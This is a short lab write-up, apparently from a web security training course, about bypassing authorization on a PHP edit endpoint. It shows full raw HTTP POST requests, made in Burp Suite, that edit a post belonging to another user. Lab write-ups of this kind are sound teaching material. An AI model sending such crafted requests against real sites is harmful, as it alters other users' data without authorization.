# Challenge
Okay so looks like it's identical to the last lab.
We still have the edit endpoint that we're not supposed to access
`gfdhghjhgjhfghj.php - the edit endpoints`

If we send a GET request to that endpoint it'll redirect us to index.php.
If we supply an ID it also redirects us to index.php
So looks like we can't stop there?

But what if we try to send POST request with valid parameters that it's expecting?
# Bug

Let's look at the last lab when we sent a POST request
```http
POST /cheesems-3/gfdhghjhgjhfghj.php?id=4575 HTTP/1.1
Host: 23.239.9.22
Content-Length: 86
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://23.239.9.22
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://23.239.9.22/cheesems-3/gfdhghjhgjhfghj.php?id=4575
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=m7lk6n9c45304so6p2a66vcmdi
dnt: 1
sec-gpc: 1
Connection: close

id=4573&title=lol+hacked+agian+by+user1&description=lol+hacked+agian+by+user1&upd=Edit
```
So the it needs a GET ID parameter and some other parameters in the POST body.
Let's craft our payload.
I'll be targetting post 4573 which is owned by user2, so I SHOULD not be able to edit it.

Intercept a GET request to the endpoint and change the method to POST in BurpSuite
Let's copy the parameters in the body from the last lab and slap that in with the ID.

```http
POST /cheesems-4/gfdhghjhgjhfghj.php?id=4573 HTTP/1.1
Host: 23.239.9.22
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=m7lk6n9c45304so6p2a66vcmdi
dnt: 1
sec-gpc: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

id=4573&title=hacked+twice+by+user+1description=hacked+by+user+1&upd=Edit
```

Now let's send the request and let's check the website to see if our request changed the post.
And it did change it! 
